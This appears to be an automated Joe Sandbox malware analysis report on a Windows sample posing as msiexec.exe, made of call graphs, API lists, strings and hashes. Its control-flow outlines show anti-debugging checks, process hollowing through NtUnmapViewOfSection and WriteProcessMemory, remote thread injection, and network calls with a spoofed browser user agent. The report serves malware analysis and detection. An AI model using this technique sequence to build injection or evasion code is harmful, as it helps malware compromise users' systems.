22->48 101 Function_00007FF7EE063710 22->101 23 Function_00007FF7EE06216C 24 Function_00007FF7EE063368 24->87 25 Function_00007FF7EE06E668 26 Function_00007FF7EE06B776 27 Function_00007FF7EE06EC71 28 Function_00007FF7EE06EA72 29 Function_00007FF7EE06B772 30 Function_00007FF7EE06B26F 31 Function_00007FF7EE062458 32 Function_00007FF7EE06FE5A 33 Function_00007FF7EE06D65A 34 Function_00007FF7EE06B05A 35 Function_00007FF7EE063559 36 Function_00007FF7EE06B061 37 Function_00007FF7EE061088 38 Function_00007FF7EE063188 99 Function_00007FF7EE063008 38->99 39 Function_00007FF7EE063388 39->87 40 Function_00007FF7EE06E289 41 Function_00007FF7EE06DA94 42->101 69 Function_00007FF7EE063FD0 43->69 44 Function_00007FF7EE064390 45 Function_00007FF7EE063078 45->14 45->48 83 Function_00007FF7EE063BF0 45->83 84 Function_00007FF7EE063DF0 45->84 102 Function_00007FF7EE064410 45->102 46 Function_00007FF7EE06E079 47 Function_00007FF7EE06B778 49 Function_00007FF7EE06147F 50 Function_00007FF7EE06E07F 51 Function_00007FF7EE06E4AB 53->0 53->1 53->42 53->43 53->86 54 Function_00007FF7EE062EA8 55 Function_00007FF7EE06FEA9 56 Function_00007FF7EE06E6B4 57->5 81 Function_00007FF7EE063AF0 57->81 59 Function_00007FF7EE0700B0 61 Function_00007FF7EE06CE9D 62 Function_00007FF7EE062498 63 Function_00007FF7EE06E0A5 64 Function_00007FF7EE06F6A3 65 Function_00007FF7EE06E0A1 66 Function_00007FF7EE0701A2 67 Function_00007FF7EE06E6CD 68 Function_00007FF7EE0636C8 71 Function_00007FF7EE0636B8 72 Function_00007FF7EE06EDB8 73 Function_00007FF7EE0613C4 74 Function_00007FF7EE06E6C5 75 Function_00007FF7EE0635C5 77 Function_00007FF7EE06B2C0 79 Function_00007FF7EE06D2E7 80 Function_00007FF7EE06E9F6 85 Function_00007FF7EE06BBF2 86->21 86->73 109 Function_00007FF7EE061000 86->109 87->4 87->31 87->62 88 Function_00007FF7EE0701DA 89 Function_00007FF7EE06B0D8 90 Function_00007FF7EE06D2E5 91 Function_00007FF7EE06F7E6 92 Function_00007FF7EE06D2E3 93 Function_00007FF7EE06C2E4 95 Function_00007FF7EE0636E0 96 Function_00007FF7EE06CCE1 97 Function_00007FF7EE06D70B 98 Function_00007FF7EE062E08 99->98 100 Function_00007FF7EE06EC09 101->95 102->44 103 Function_00007FF7EE06BBFB 104 Function_00007FF7EE06BBF9 105 Function_00007FF7EE06BBF7 106 Function_00007FF7EE06C4F8 107 Function_00007FF7EE06EA05 108 Function_00007FF7EE06DE04 110->13

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF7EE063418 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 231 7ff7ee063418-7ff7ee06342e call 7ff7ee06153c call 7ff7ee0631b8 236 7ff7ee063438-7ff7ee063466 call 7ff7ee0640b0 call 7ff7ee063cb0 call 7ff7ee063ee0 231->236 237 7ff7ee063430-7ff7ee063432 ExitProcess 231->237 244 7ff7ee063468-7ff7ee063479 call 7ff7ee0641f0 236->244 245 7ff7ee0634b7-7ff7ee0634ca call 7ff7ee063ee0 236->245 252 7ff7ee06347b-7ff7ee06348c call 7ff7ee0641f0 244->252 253 7ff7ee06348e-7ff7ee063490 ExitProcess 244->253 250 7ff7ee0634cc-7ff7ee0634dd call 7ff7ee0641f0 245->250 251 7ff7ee063508-7ff7ee06351b call 7ff7ee063ee0 245->251 262 7ff7ee0634e7 call 7ff7ee063218 250->262 263 7ff7ee0634df-7ff7ee0634e1 ExitProcess 250->263 260 7ff7ee06355e-7ff7ee063574 call 7ff7ee063a40 call 7ff7ee0633a8 251->260 261 7ff7ee06351d-7ff7ee06352e call 7ff7ee0641f0 251->261 252->253 264 7ff7ee063496 call 7ff7ee0632a8 252->264 282 7ff7ee0635ca-7ff7ee0636a2 CreateThread * 3 WaitForMultipleObjects ExitProcess 260->282 283 7ff7ee063576-7ff7ee063587 call 7ff7ee0641f0 260->283 275 7ff7ee063538 call 7ff7ee063218 261->275 276 7ff7ee063530-7ff7ee063532 ExitProcess 261->276 271 7ff7ee0634ec-7ff7ee0634f1 262->271 269 7ff7ee06349b-7ff7ee0634a0 264->269 273 7ff7ee0634af-7ff7ee0634b1 ExitProcess 269->273 274 7ff7ee0634a2-7ff7ee0634ad Sleep 269->274 277 7ff7ee0634f3-7ff7ee0634fe Sleep 271->277 278 7ff7ee063500-7ff7ee063502 ExitProcess 271->278 274->269 284 7ff7ee06353d-7ff7ee063542 275->284 277->271 289 7ff7ee06359c-7ff7ee06359e ExitProcess 283->289 290 7ff7ee063589-7ff7ee06359a call 7ff7ee0641f0 283->290 286 7ff7ee063544-7ff7ee06354f Sleep 284->286 287 7ff7ee063551-7ff7ee063553 ExitProcess 284->287 286->284 290->289 293 7ff7ee0635a4 call 7ff7ee0632a8 290->293 295 7ff7ee0635a9-7ff7ee0635ae 293->295 296 7ff7ee0635bd-7ff7ee0635bf ExitProcess 295->296 297 7ff7ee0635b0-7ff7ee0635bb Sleep 295->297 297->295
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: 0fb382aed2c971499bc3801ada7fa2d75d1e50236cca8bce2ee0cb85788a5540
                                                                                                                                                                                                                        • Instruction ID: 48ba1b43c2dadba13e06294e3910f702cf6a78713b01d25124c99af8251ba9dc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0fb382aed2c971499bc3801ada7fa2d75d1e50236cca8bce2ee0cb85788a5540
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D613F60B0C69395F764B721A85537AE2A0BF80704FE20937D54E86DE5DEBDE40982F2
                                                                                                                                                                                                                        Function 00007FF7EE0640B0 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 5883799f07d152a8d2a009714e5b601515180045f018943f2e62cfac24bd2fab
                                                                                                                                                                                                                        • Instruction ID: 069f0d5c8c8b0f5e871ad8e10a4064866bf34a5211e12a917a1206331f575bfe
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5883799f07d152a8d2a009714e5b601515180045f018943f2e62cfac24bd2fab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74310732B18A8286D750EB15E45072AF7B0FBD4790FA11436EA8E47F68DFBCD4408B11
                                                                                                                                                                                                                        Function 00007FF7EE0631B8 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
                                                                                                                                                                                                                        • Opcode ID: 2760cc306fb648241171a8ad32ec7adba68cc7e55a00feed93d80baffd57ff2b
                                                                                                                                                                                                                        • Instruction ID: 253608b882554a15fc5fc98effebe71efab9f82733911929e1ecb06008e7de1c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2760cc306fb648241171a8ad32ec7adba68cc7e55a00feed93d80baffd57ff2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ECF05421B0C183C5E7306B15940433997E0BB95704FA60576D19D05994CFBCD509CBB7
                                                                                                                                                                                                                        Function 00007FF7EE0641F0 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4294037311-0
                                                                                                                                                                                                                        • Opcode ID: b286f069edb268d931baafffa844daa9a4e0797f43d90c92f4ac81a687af92b3
                                                                                                                                                                                                                        • Instruction ID: 058fd4de8562247adf695939b9f99fc3cedfa65cb76806a1ad622eaeddc85268
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b286f069edb268d931baafffa844daa9a4e0797f43d90c92f4ac81a687af92b3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32F0C025A0C64382EB60AF50E40437DA3B0FBA6714FF10936D58E42E64CF7DD4459622
                                                                                                                                                                                                                        Function 00007FF7EE0614EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 328 7ff7ee0614ec-7ff7ee061528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: 78acad9e4d89f6149a4a89a45dc777de0566b64504d2480e7012dbe158810d49
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91E09276608F81C6DA60EB15F84021AB7B4FBC8794FA04525EACD42B28CF3CC165CB10
                                                                                                                                                                                                                        Function 00007FF7EE063AF0 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 329 7ff7ee063af0-7ff7ee063aff 330 7ff7ee063b14-7ff7ee063b18 329->330 331 7ff7ee063b01-7ff7ee063b0e VirtualFree 329->331 331->330
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 02a68683b8a88d890b7632b1029efc6fd5a6036bd7126e420ffe44a182f27b57
                                                                                                                                                                                                                        • Instruction ID: 3fbc95f1f2e7148e996af4b6c57b1b21051fd3bbfc57320b2358ae6aa259f827
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02a68683b8a88d890b7632b1029efc6fd5a6036bd7126e420ffe44a182f27b57
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EDD01221F3898282EB94EB26E889715E2B0FBC4744F909036E68941964CF7CC099CF11

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 00007FF7EE0624D8 Relevance: 63.4, APIs: 32, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 332 7ff7ee0624d8-7ff7ee062552 GetModuleFileNameW 333 7ff7ee062559-7ff7ee062595 332->333 334 7ff7ee062554 332->334 336 7ff7ee0625ad-7ff7ee0625c9 call 7ff7ee062418 333->336 337 7ff7ee062597-7ff7ee06259f 333->337 335 7ff7ee062dfd-7ff7ee062e05 334->335 348 7ff7ee06260c-7ff7ee062616 336->348 338 7ff7ee0625cb-7ff7ee0625e7 call 7ff7ee062458 337->338 339 7ff7ee0625a1-7ff7ee0625a9 337->339 338->348 341 7ff7ee0625ab-7ff7ee062607 339->341 342 7ff7ee0625e9-7ff7ee062605 call 7ff7ee062498 339->342 341->335 342->348 350 7ff7ee06261d-7ff7ee062671 CreateProcessW 348->350 351 7ff7ee062618 348->351 352 7ff7ee062678-7ff7ee0626b8 350->352 353 7ff7ee062673 350->353 351->335 355 7ff7ee0626ba 352->355 356 7ff7ee0626bf-7ff7ee0626db GetFileSize 352->356 353->335 355->335 357 7ff7ee0626dd-7ff7ee0626e5 356->357 358 7ff7ee0626e7-7ff7ee0626f2 CloseHandle 356->358 357->358 359 7ff7ee0626f7-7ff7ee06271f VirtualAlloc 357->359 358->335 360 7ff7ee062731-7ff7ee06275c ReadFile 359->360 361 7ff7ee062721-7ff7ee06272c CloseHandle 359->361 362 7ff7ee06275e-7ff7ee06277c VirtualFree CloseHandle 360->362 363 7ff7ee062781-7ff7ee0627cf CloseHandle GetThreadContext 360->363 361->335 362->335 364 7ff7ee0627e9-7ff7ee06286e ReadProcessMemory GetModuleHandleA GetProcAddress 363->364 365 7ff7ee0627d1-7ff7ee0627e4 VirtualFree 363->365 367 7ff7ee062888-7ff7ee0628f1 VirtualAllocEx 364->367 368 7ff7ee062870-7ff7ee062883 VirtualFree 364->368 365->335 369 7ff7ee06290b-7ff7ee06293f WriteProcessMemory 367->369 370 7ff7ee0628f3-7ff7ee062906 VirtualFree 367->370 368->335 371 7ff7ee062959-7ff7ee062964 369->371 372 7ff7ee062941-7ff7ee062954 VirtualFree 369->372 370->335 373 7ff7ee062976-7ff7ee062989 371->373 372->335 374 7ff7ee062a37-7ff7ee062a7e 373->374 375 7ff7ee06298f-7ff7ee062a18 WriteProcessMemory 373->375 378 7ff7ee062a90-7ff7ee062aa3 374->378 376 7ff7ee062a1a-7ff7ee062a2d VirtualFree 375->376 377 7ff7ee062a32 375->377 376->335 377->373 380 7ff7ee062d28-7ff7ee062dac WriteProcessMemory SetThreadContext 378->380 381 7ff7ee062aa9-7ff7ee062af8 RtlCompareMemory 378->381 382 7ff7ee062dae-7ff7ee062dc1 VirtualFree 380->382 383 7ff7ee062dc3-7ff7ee062dd3 ResumeThread 380->383 384 7ff7ee062afc-7ff7ee062b25 381->384 385 7ff7ee062afa 381->385 382->335 387 7ff7ee062dea-7ff7ee062df7 VirtualFree 383->387 388 7ff7ee062dd5-7ff7ee062de8 VirtualFree 383->388 389 7ff7ee062b30-7ff7ee062b3e 384->389 385->378 387->335 388->335 390 7ff7ee062b44-7ff7ee062bcf 389->390 391 7ff7ee062d23 389->391 392 7ff7ee062be1-7ff7ee062bef 390->392 391->380 393 7ff7ee062d1e 392->393 394 7ff7ee062bf5-7ff7ee062c28 392->394 393->389 395 7ff7ee062c2c-7ff7ee062cff ReadProcessMemory WriteProcessMemory 394->395 396 7ff7ee062c2a 394->396 398 7ff7ee062d19 395->398 399 7ff7ee062d01-7ff7ee062d14 VirtualFree 395->399 396->392 398->393 399->335
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                        • API String ID: 514040917-3001742581
                                                                                                                                                                                                                        • Opcode ID: a84cd30e02b54a1d7e6c2a6b1c87ff30d9e49ed3be8c7b01658cf5b106b86537
                                                                                                                                                                                                                        • Instruction ID: 11112ae73f1d858c7787e282aa2ca374d7cc60d1b5a25366e380e79713860160
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a84cd30e02b54a1d7e6c2a6b1c87ff30d9e49ed3be8c7b01658cf5b106b86537
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF32D632708AC286E770DB16E8547AAB3A1FB88B84F514536DACE87F58DF7CD4448B11
                                                                                                                                                                                                                        Function 00007FF7EE0610D8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: 893c63271924b117f8dd7478d4dbb6a73e12d81475a911f9f049130994166c0b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F571EF3160CA8286F770AB55E44436AF7A0F784744FA14936D68D87FA8DFBCD484CB51
                                                                                                                                                                                                                        Function 00007FF7EE06216C Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7EE0621A9
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: fc41c48b696f2292e6165caa7080af249ce6d4eefb844c9705a23d0a02d259c6
                                                                                                                                                                                                                        • Instruction ID: e16c1c18214717999e39cd2a00c7857176eb3df1b76af1dd16bcdd7c5be89ac6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc41c48b696f2292e6165caa7080af249ce6d4eefb844c9705a23d0a02d259c6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB71D93261CA8282E750DB55F45432AF7B0FBC4794F615436EA8A47F68CFBDD4848B21
                                                                                                                                                                                                                        Function 00007FF7EE064530 Relevance: 24.2, APIs: 16, Instructions: 155memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
